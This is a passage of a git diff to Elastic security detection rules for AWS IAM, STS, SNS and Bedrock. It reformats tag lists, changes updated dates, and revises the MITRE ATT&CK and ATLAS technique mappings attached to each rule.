"MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_iam_saml_provider_updated.toml b/rules/integrations/aws/privilege_escalation_iam_saml_provider_updated.toml index 15745c5cb4d..4b9ab1316e7 100644 --- a/rules/integrations/aws/privilege_escalation_iam_saml_provider_updated.toml +++ b/rules/integrations/aws/privilege_escalation_iam_saml_provider_updated.toml @@ -2,7 +2,7 @@ creation_date = "2021/09/22" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic", "Austin Songer"] @@ -102,7 +102,15 @@ references = ["https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAM risk_score = 47 rule_id = "979729e7-0c52-4c4c-b71e-88103304a79f" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS IAM", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS IAM", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -117,39 +125,22 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" - [[rule.threat.technique.subtechnique]] id = "T1484.002" name = "Trust Modification" reference = "https://attack.mitre.org/techniques/T1484/002/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" - -[[rule.threat.technique.subtechnique]] -id = "T1484.002" -name = "Trust Modification" -reference = "https://attack.mitre.org/techniques/T1484/002/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_iam_update_assume_role_policy.toml b/rules/integrations/aws/privilege_escalation_iam_update_assume_role_policy.toml index 8e13ad18bb8..bc91f308bb7 100644 --- a/rules/integrations/aws/privilege_escalation_iam_update_assume_role_policy.toml +++ b/rules/integrations/aws/privilege_escalation_iam_update_assume_role_policy.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/06" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/22" min_stack_comments = "New entity classification fields added: entity.target.id" min_stack_version = "9.2.0" @@ -75,7 +75,15 @@ references = ["https://labs.bishopfox.com/tech-blog/5-privesc-attack-vectors-in- risk_score = 21 rule_id = "a60326d7-dca7-4fb7-93eb-1ca03a1febbd" severity = "low" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS IAM", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS IAM", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Tactic: Privilege Escalation", +] timestamp_override = "event.ingested" type = "new_terms" @@ -89,39 +97,22 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" [[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_role_assumption_by_service.toml b/rules/integrations/aws/privilege_escalation_role_assumption_by_service.toml index 91424af9073..c65c86306e6 100644 --- a/rules/integrations/aws/privilege_escalation_role_assumption_by_service.toml +++ b/rules/integrations/aws/privilege_escalation_role_assumption_by_service.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/17" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/16" [rule] author = ["Elastic", "Austin Songer"] @@ -73,7 +73,16 @@ references = ["https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRol risk_score = 21 rule_id = "93075852-b0f5-4b8b-89c3-a226efae5726" severity = "low" -tags = ["Domain: Cloud", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS STS", "Resources: Investigation Guide", "Use Case: Identity and Access Audit"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS STS", + "Resources: Investigation Guide", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation", + "Tactic: Lateral Movement", +] timestamp_override = "event.ingested" type = "new_terms" @@ -100,21 +109,34 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_role_assumption_by_user.toml b/rules/integrations/aws/privilege_escalation_role_assumption_by_user.toml index cd0e19ac332..0abf5a097d8 100644 --- a/rules/integrations/aws/privilege_escalation_role_assumption_by_user.toml +++ b/rules/integrations/aws/privilege_escalation_role_assumption_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/05" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/27" [rule] author = ["Elastic"] @@ -71,7 +71,16 @@ references = ["https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRol risk_score = 21 rule_id = "288a198e-9b9b-11ef-a0a8-f661ea17fbcd" severity = "low" -tags = ["Domain: Cloud", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS STS", "Resources: Investigation Guide", "Use Case: Identity and Access Audit"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS STS", + "Resources: Investigation Guide", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation", + "Tactic: Lateral Movement", +] timestamp_override = "event.ingested" type = "new_terms" @@ -86,21 +95,34 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.005" -name = "Temporary Elevated Cloud Access" -reference = "https://attack.mitre.org/techniques/T1548/005/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_sts_assume_root_from_rare_user_and_member_account.toml b/rules/integrations/aws/privilege_escalation_sts_assume_root_from_rare_user_and_member_account.toml index ce86a7ec2d3..49cbe18daaf 100644 --- a/rules/integrations/aws/privilege_escalation_sts_assume_root_from_rare_user_and_member_account.toml +++ b/rules/integrations/aws/privilege_escalation_sts_assume_root_from_rare_user_and_member_account.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/24" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -161,21 +161,39 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique.subtechnique]] id = "T1548.005" name = "Temporary Elevated Cloud Access" reference = "https://attack.mitre.org/techniques/T1548/005/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_sts_role_chaining.toml b/rules/integrations/aws/privilege_escalation_sts_role_chaining.toml index 5d7bc1dd47b..6e489d34aec 100644 --- a/rules/integrations/aws/privilege_escalation_sts_role_chaining.toml +++ b/rules/integrations/aws/privilege_escalation_sts_role_chaining.toml @@ -2,7 +2,7 @@ creation_date = "2024/10/23" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -89,7 +89,17 @@ references = [ risk_score = 47 rule_id = "ba5a0b0c-b477-4729-a3dc-0147c2049cf1" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS STS", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS STS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -124,39 +134,41 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" [[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.new_terms] field = "new_terms_fields" value = ["aws.cloudtrail.user_identity.session_context.session_issuer.arn", "aws.cloudtrail.resources.arn"] diff --git a/rules/integrations/aws/resource_development_sns_topic_created_by_rare_user.toml b/rules/integrations/aws/resource_development_sns_topic_created_by_rare_user.toml index d4dcde5af1c..275e3f821a8 100644 --- a/rules/integrations/aws/resource_development_sns_topic_created_by_rare_user.toml +++ b/rules/integrations/aws/resource_development_sns_topic_created_by_rare_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/11" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -79,7 +79,16 @@ references = [ risk_score = 21 rule_id = "3c3f65b8-e8b4-11ef-9511-f661ea17fbce" severity = "low" -tags = ["Domain: Cloud", "Tactic: Impact", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS SNS", "Resources: Investigation Guide", "Use Case: Threat Detection"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS SNS", + "Resources: Investigation Guide", + "Use Case: Threat Detection", + "Tactic: Resource Development", + "Tactic: Impact", +] timestamp_override = "event.ingested" type = "new_terms" @@ -93,21 +102,33 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1608" +name = "Stage Capabilities" +reference = "https://attack.mitre.org/techniques/T1608/" + +[rule.threat.tactic] +id = "TA0042" +name = "Resource Development" +reference = "https://attack.mitre.org/tactics/TA0042/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1496" name = "Resource Hijacking" reference = "https://attack.mitre.org/techniques/T1496/" - [[rule.threat.technique.subtechnique]] id = "T1496.004" name = "Cloud Service Hijacking" reference = "https://attack.mitre.org/techniques/T1496/004/" + [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws_bedrock/aws_bedrock_execution_without_guardrails.toml b/rules/integrations/aws_bedrock/aws_bedrock_execution_without_guardrails.toml index 342420cbf1c..a500a627229 100644 --- a/rules/integrations/aws_bedrock/aws_bedrock_execution_without_guardrails.toml +++ b/rules/integrations/aws_bedrock/aws_bedrock_execution_without_guardrails.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/25" integration = ["aws_bedrock"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/25" [rule] author = ["Elastic"] @@ -67,7 +67,15 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html """ severity = "medium" -tags = ["Domain: LLM", "Tactic: Defense Evasion", "Tactic: AI Model Access", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Resources: Investigation Guide", "Use Case: Policy Violation", "Mitre Atlas: T0051", "Mitre Atlas: T0054"] +tags = [ + "Domain: LLM", + "Data Source: AWS Bedrock", + "Data Source: AWS S3", + "Resources: Investigation Guide", + "Use Case: Policy Violation", + "Mitre Atlas: T0051", + "Mitre Atlas: T0054", +] timestamp_override = "event.ingested" type = "esql" @@ -99,41 +107,3 @@ from logs-aws_bedrock.invocation-* | sort Esql.ml_invocations_no_guardrails_count desc ''' -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0040" -name = "AI Model Inference API Access" -reference = "https://atlas.mitre.org/techniques/AML.T0040/" - -[rule.threat.tactic] -id = "AML.TA0000" -name = "AI Model Access" -reference = "https://atlas.mitre.org/tactics/AML.TA0000/" - -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0094" -name = "Delay Execution of LLM Instructions" -reference = "https://atlas.mitre.org/techniques/AML.T0094/" - -[rule.threat.tactic] -id = "AML.TA0007" -name = "Defense Evasion" -reference = "https://atlas.mitre.org/tactics/AML.TA0007/" diff --git a/rules/integrations/aws_bedrock/aws_bedrock_guardrails_multiple_violations_by_single_user.toml b/rules/integrations/aws_bedrock/aws_bedrock_guardrails_multiple_violations_by_single_user.toml index 2f835ffd183..b4749c143ba 100644 --- a/rules/integrations/aws_bedrock/aws_bedrock_guardrails_multiple_violations_by_single_user.toml +++ b/rules/integrations/aws_bedrock/aws_bedrock_guardrails_multiple_violations_by_single_user.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/02" integration = ["aws_bedrock"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/25" [rule] author = ["Elastic"] @@ -68,7 +68,15 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html """ severity = "medium" -tags = ["Domain: LLM", "Tactic: Defense Evasion", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Resources: Investigation Guide", "Use Case: Policy Violation", "Mitre Atlas: T0051", "Mitre Atlas: T0054"] +tags = [ + "Domain: LLM", + "Data Source: AWS Bedrock", + "Data Source: AWS S3", + "Resources: Investigation Guide", + "Use Case: Policy Violation", + "Mitre Atlas: T0051", + "Mitre Atlas: T0054", +] timestamp_override = "event.ingested" type = "esql" @@ -99,15 +107,3 @@ from logs-aws_bedrock.invocation-* | sort Esql.ml_violations_count desc ''' -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0015" -name = "Evade AI Model" -reference = "https://atlas.mitre.org/techniques/AML.T0015/" - -[rule.threat.tactic] -id = "AML.TA0007" -name = "Defense Evasion" -reference = "https://atlas.mitre.org/tactics/AML.TA0007/" diff --git a/rules/integrations/aws_bedrock/aws_bedrock_guardrails_multiple_violations_in_single_request.toml b/rules/integrations/aws_bedrock/aws_bedrock_guardrails_multiple_violations_in_single_request.toml index cccd06e4041..1ea547c91c7 100644 --- a/rules/integrations/aws_bedrock/aws_bedrock_guardrails_multiple_violations_in_single_request.toml +++ b/rules/integrations/aws_bedrock/aws_bedrock_guardrails_multiple_violations_in_single_request.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/02" integration = ["aws_bedrock"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/10" [rule] author = ["Elastic"] @@ -68,7 +68,15 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html """ severity = "low" -tags = ["Domain: LLM", "Tactic: Defense Evasion", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Resources: Investigation Guide", "Use Case: Policy Violation", "Mitre Atlas: T0051", "Mitre Atlas: T0054"] +tags = [ + "Domain: LLM", + "Data Source: AWS Bedrock", + "Data Source: AWS S3", + "Resources: Investigation Guide", + "Use Case: Policy Violation", + "Mitre Atlas: T0051", + "Mitre Atlas: T0054", +] timestamp_override = "event.ingested" type = "esql" @@ -108,15 +116,3 @@ from logs-aws_bedrock.invocation-* | sort Esql.ml_policy_violations_total_unique_requests_count desc ''' -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0015" -name = "Evade AI Model" -reference = "https://atlas.mitre.org/techniques/AML.T0015/" - -[rule.threat.tactic] -id = "AML.TA0007" -name = "Defense Evasion" -reference = "https://atlas.mitre.org/tactics/AML.TA0007/" diff --git a/rules/integrations/aws_bedrock/aws_bedrock_high_confidence_misconduct_blocks_detected.toml b/rules/integrations/aws_bedrock/aws_bedrock_high_confidence_misconduct_blocks_detected.toml index e69765cf766..f2706780c70 100644 --- a/rules/integrations/aws_bedrock/aws_bedrock_high_confidence_misconduct_blocks_detected.toml +++ b/rules/integrations/aws_bedrock/aws_bedrock_high_confidence_misconduct_blocks_detected.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/05" integration = ["aws_bedrock"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/10" [rule] author = ["Elastic"] @@ -67,7 +67,15 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html """ severity = "medium" -tags = ["Domain: LLM", "Tactic: Execution", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Use Case: Policy Violation", "Mitre Atlas: T0051", "Mitre Atlas: T0054", "Resources: Investigation Guide"] +tags = [ + "Domain: LLM", + "Data Source: AWS Bedrock", + "Data Source: AWS S3", + "Use Case: Policy Violation", + "Mitre Atlas: T0051", + "Mitre Atlas: T0054", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -112,15 +120,3 @@ from logs-aws_bedrock.invocation-* | sort Esql.ml_policy_blocked_violation_total_count desc ''' -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0051" -name = "LLM Prompt Injection" -reference = "https://atlas.mitre.org/techniques/AML.T0051/" - -[rule.threat.tactic] -id = "AML.TA0005" -name = "Execution" -reference = "https://atlas.mitre.org/tactics/AML.TA0005/" diff --git a/rules/integrations/aws_bedrock/aws_bedrock_high_resource_consumption_detection.toml b/rules/integrations/aws_bedrock/aws_bedrock_high_resource_consumption_detection.toml index f8addb7be34..6a2358b50ba 100644 --- a/rules/integrations/aws_bedrock/aws_bedrock_high_resource_consumption_detection.toml +++ b/rules/integrations/aws_bedrock/aws_bedrock_high_resource_consumption_detection.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/04" integration = ["aws_bedrock"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/25" [rule] author = ["Elastic"] @@ -66,7 +66,16 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html """ severity = "medium" -tags = ["Domain: LLM", "Tactic: Exfiltration", "Tactic: Impact", "Tactic: AI Model Access", "Data Source: AWS Bedrock", "Data Source: Amazon Web Services", "Data Source: AWS S3", "Use Case: Potential Overload", "Use Case: Resource Exhaustion", "Mitre Atlas: LLM04", "Resources: Investigation Guide"] +tags = [ + "Domain: LLM", + "Data Source: AWS Bedrock", + "Data Source: Amazon Web Services", + "Data Source: AWS S3", + "Use Case: Potential Overload", + "Use Case: Resource Exhaustion", + "Mitre Atlas: LLM04", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -106,72 +115,3 @@ from logs-aws_bedrock.invocation-* | sort Esql.ml_risk_score desc ''' -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1020" -name = "Automated Exfiltration" -reference = "https://attack.mitre.org/techniques/T1020/" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1499" -name = "Endpoint Denial of Service" -reference = "https://attack.mitre.org/techniques/T1499/" - -[[rule.threat.technique.subtechnique]] -id = "T1499.003" -name = "Application Exhaustion Flood" -reference = "https://attack.mitre.org/techniques/T1499/003/" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0040" -name = "AI Model Inference API Access" -reference = "https://atlas.mitre.org/techniques/AML.T0040/" - -[rule.threat.tactic] -id = "AML.TA0000" -name = "AI Model Access" -reference = "https://atlas.mitre.org/tactics/AML.TA0000/" - -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0024" -name = "Exfiltration via AI Inference API" -reference = "https://atlas.mitre.org/techniques/AML.T0024/" - -[rule.threat.tactic] -id = "AML.TA0010" -name = "Exfiltration" -reference = "https://atlas.mitre.org/tactics/AML.TA0010/" - -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0046" -name = "Spamming AI System with Chaff Data" -reference = "https://atlas.mitre.org/techniques/AML.T0046/" - -[rule.threat.tactic] -id = "AML.TA0011" -name = "Impact" -reference = "https://atlas.mitre.org/tactics/AML.TA0011/" diff --git a/rules/integrations/aws_bedrock/aws_bedrock_multiple_attempts_to_use_denied_models_by_user.toml b/rules/integrations/aws_bedrock/aws_bedrock_multiple_attempts_to_use_denied_models_by_user.toml index bb89d860f1b..ac6eb38eb16 100644 --- a/rules/integrations/aws_bedrock/aws_bedrock_multiple_attempts_to_use_denied_models_by_user.toml +++ b/rules/integrations/aws_bedrock/aws_bedrock_multiple_attempts_to_use_denied_models_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/02" integration = ["aws_bedrock"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/25" [rule] author = ["Elastic"] @@ -64,7 +64,15 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html """ severity = "high" -tags = ["Domain: LLM", "Tactic: AI Model Access", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Resources: Investigation Guide", "Use Case: Policy Violation", "Mitre Atlas: T0015", "Mitre Atlas: T0034"] +tags = [ + "Domain: LLM", + "Data Source: AWS Bedrock", + "Data Source: AWS S3", + "Resources: Investigation Guide", + "Use Case: Policy Violation", + "Mitre Atlas: T0015", + "Mitre Atlas: T0034", +] timestamp_override = "event.ingested" type = "esql" @@ -101,15 +109,3 @@ from logs-aws_bedrock.invocation-* [rule.investigation_fields] field_names = ["user.id", "cloud.account.id", "gen_ai.request.model.id", "total_denials"] -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0040" -name = "AI Model Inference API Access" -reference = "https://atlas.mitre.org/techniques/AML.T0040/" - -[rule.threat.tactic] -id = "AML.TA0000" -name = "AI Model Access" -reference = "https://atlas.mitre.org/tactics/AML.TA0000/" diff --git a/rules/integrations/aws_bedrock/aws_bedrock_multiple_sensitive_information_policy_blocks_detected.toml b/rules/integrations/aws_bedrock/aws_bedrock_multiple_sensitive_information_policy_blocks_detected.toml index b5824163b1e..2e665685b4f 100644 --- a/rules/integrations/aws_bedrock/aws_bedrock_multiple_sensitive_information_policy_blocks_detected.toml +++ b/rules/integrations/aws_bedrock/aws_bedrock_multiple_sensitive_information_policy_blocks_detected.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/20" integration = ["aws_bedrock"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/10" [rule] author = ["Elastic"] @@ -66,7 +66,15 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html """ severity = "medium" -tags = ["Domain: LLM", "Tactic: Discovery", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Use Case: Policy Violation", "Mitre Atlas: T0051", "Mitre Atlas: T0054", "Resources: Investigation Guide"] +tags = [ + "Domain: LLM", + "Data Source: AWS Bedrock", + "Data Source: AWS S3", + "Use Case: Policy Violation", + "Mitre Atlas: T0051", + "Mitre Atlas: T0054", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -98,15 +106,3 @@ from logs-aws_bedrock.invocation-* | sort Esql.ml_policy_blocked_sensitive_info_count desc ''' -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0089" -name = "Process Discovery" -reference = "https://atlas.mitre.org/techniques/AML.T0089/" - -[rule.threat.tactic] -id = "AML.TA0008" -name = "Discovery" -reference = "https://atlas.mitre.org/tactics/AML.TA0008/" diff --git a/rules/integrations/aws_bedrock/aws_bedrock_multiple_topic_policy_blocks_detected.toml b/rules/integrations/aws_bedrock/aws_bedrock_multiple_topic_policy_blocks_detected.toml index c2a53901fee..c98ff4ef1f5 100644 --- a/rules/integrations/aws_bedrock/aws_bedrock_multiple_topic_policy_blocks_detected.toml +++ b/rules/integrations/aws_bedrock/aws_bedrock_multiple_topic_policy_blocks_detected.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/20" integration = ["aws_bedrock"] maturity = "production" -updated_date = "2026/03/23" +updated_date = 